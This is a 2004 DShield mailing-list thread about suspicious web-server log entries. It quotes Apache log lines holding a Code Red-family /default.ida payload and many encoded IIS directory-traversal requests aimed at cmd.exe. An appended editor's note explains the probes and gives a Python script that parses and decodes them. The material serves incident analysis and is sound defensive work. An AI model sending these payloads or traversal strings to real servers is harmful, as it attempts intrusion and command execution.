[Dshield] Suspect HTTP-activity

Bruyere, Michel mbruyere at ezemcanada.com
Fri Jan 23 20:30:19 GMT 2004


It seems to be Code Red or Code Red II requests.


Try a search on Google with
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

You'll find many threads talking about it... An old one that seems to be
coming back...

M.Bruyere


> -----Original Message-----
> From: Martin Agren [mailto:martin.agren at home.se]
> Sent: Friday 23 January 2004 13:31
> To: list at dshield.org
> Subject: [Dshield] Suspect HTTP-activity
> 
> Hello,
> I'm a fresh subscriber to this list, and the very reason I stumbled upon
> it was that I was investigating some activity that Apache logged and
> that made me a little suspicious about the intentions behind the
> requests. So first off, hello!
> 
> I've been trying to go through the most recent archives and while what
> you discuss seems to be both interesting and important, I haven't found
> anything that match my query.
> 
> If this is the wrong place for my question, I can take pointers to other
> lists/sites for an answer. :-)
> 
> Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
> haven't publicly announced my web-server in any way -- I just use it for
> development of web-code and invite other developers to check it out.
> 
> Most of these logs seem to indicate nothing actually happened
> (404 status), but I'm curious as to what it's all about and whether anyone
> might be interested in this information. Any DShield-like service that
> collects Apache logs? ;-)
> 
> Most of these requests seem to be someone wanting to list my disk.
> 
> Are there any known worms that create these requests? Should I act in
> any way?
> 
> Any help is much appreciated!
> 
> If anyone wants me to post more logs, I can do so (it's basically just
> the same requests a couple of times)
> 
> Martin
> 
> 218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
> 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1"
> 404 320
> 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET
> /scripts/nsiislog.dll" 404 -
> 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200
> 1916
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 307
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
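Editor's note: the log excerpt above shows two distinct automated probe sets, and the question "should I act in any way?" is best answered by reading them rather than by a Google search. The /default.ida request with a long run of X's followed by %u-encoded code is the Code Red family (the X run is the Code Red II variant; the original Code Red sent N's); it targets IIS, so on Apache it only ever produces a 404. The burst from 194.47.216.32 is the classic IIS directory-traversal / command-shell probe sequence: each request tries a different encoding of "..\" (double-encoded %255c, overlong UTF-8 such as %c0%af, and the malformed %%35%63, which Apache rejects outright with a 400 as the log shows) to reach winnt/system32/cmd.exe or a previously planted root.exe and run "dir". The script below is an added example written for this note, not code from either message: it parses the quoted access.log lines, decodes each path the lenient two-round way those probes rely on (the overlong-UTF-8 handling is an assumption about the vulnerable decoder the probes were written for, not something either poster states), and groups the results per source host. The category names are this example's own, and the Code Red line is rebuilt with an arbitrary-length X run so it fits on one line.

```python
import posixpath
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, unquote_to_bytes

# Apache common log format, as in the quoted access.log:
#   host ident user [time] "METHOD target [HTTP/x.y]" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

def parse_log_line(line):
    """Parse one access.log line into a dict; None if it is not in that format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec

def _collapse_overlong(raw):
    """Fold 2-byte sequences led by 0xC0/0xC1 (overlong UTF-8, e.g. %c0%af) into the
    single byte they encode, without checking that the second byte is a valid
    continuation byte (so %c1%1c also becomes a backslash).  This leniency is an
    assumption about the decoder the probes were written for, not a statement from
    the post; a strict UTF-8 decoder rejects these sequences."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)

def decode_probe_path(path):
    """Run the two decoding rounds the traversal probes count on and normalise the
    result, to show where a request like /scripts/..%255c../winnt/... would land."""
    once = _collapse_overlong(unquote_to_bytes(path)).decode("latin-1")
    twice = unquote(once)  # second round: %255c -> %5c -> backslash
    return posixpath.normpath("/" + twice.replace("\\", "/").lstrip("/"))

CODE_RED_QUERY = re.compile(r"^([NX])\1{10,}.*%u[0-9a-f]{4}", re.I)

def classify(rec):
    """Label one parsed request.  Category names are this example's own."""
    path = rec["path"].lower()
    if path == "/default.ida":
        # A long run of one letter followed by %u-encoded code is the Code Red
        # family (X run: Code Red II; N run: the original Code Red).  The bare
        # /default.ida from 127.0.0.1 carries no payload, so it was a local check.
        if CODE_RED_QUERY.match(rec["query"]):
            return "code-red-family"
        return "default.ida-no-payload"
    if rec["method"] == "SEARCH":
        return "webdav-search-probe"
    landed = decode_probe_path(rec["path"]).lower()
    if landed.endswith(("/cmd.exe", "/root.exe")):
        return "iis-traversal-shell-probe"
    if landed.endswith("/nsiislog.dll"):
        return "iis-nsiislog-probe"
    return "unclassified"

def summarize(lines):
    """Per-source-host counts of each category; unparseable lines are skipped."""
    per_host = defaultdict(Counter)
    for line in lines:
        rec = parse_log_line(line)
        if rec is not None:
            per_host[rec["host"]][classify(rec)] += 1
    return {host: dict(counts) for host, counts in per_host.items()}

# Sample input: lines copied from the quoted post, except the first, which is
# rebuilt with an arbitrary-length X run so it fits on one line.
SAMPLE_LINES = [
    '218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?' + "X" * 64
    + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3'
    + '%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308',
    '127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320',
    '210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -',
    '202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = parse_log_line(line)
        print(rec["host"], rec["status"], classify(rec), decode_probe_path(rec["path"]))
    print(summarize(SAMPLE_LINES))
```

Every traversal variant from 194.47.216.32 decodes to the same target, /winnt/system32/cmd.exe, which is the point of the sequence: the sender does not know which encoding the victim's decoder mishandles, so it tries them all in one burst. Since the server here is Apache on Windows 2000 and every request got a 404 or 400, nothing was executed; the worthwhile action is to keep the box off the public Internet unless it needs to be there, and to submit the source addresses to DShield rather than to chase each one.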



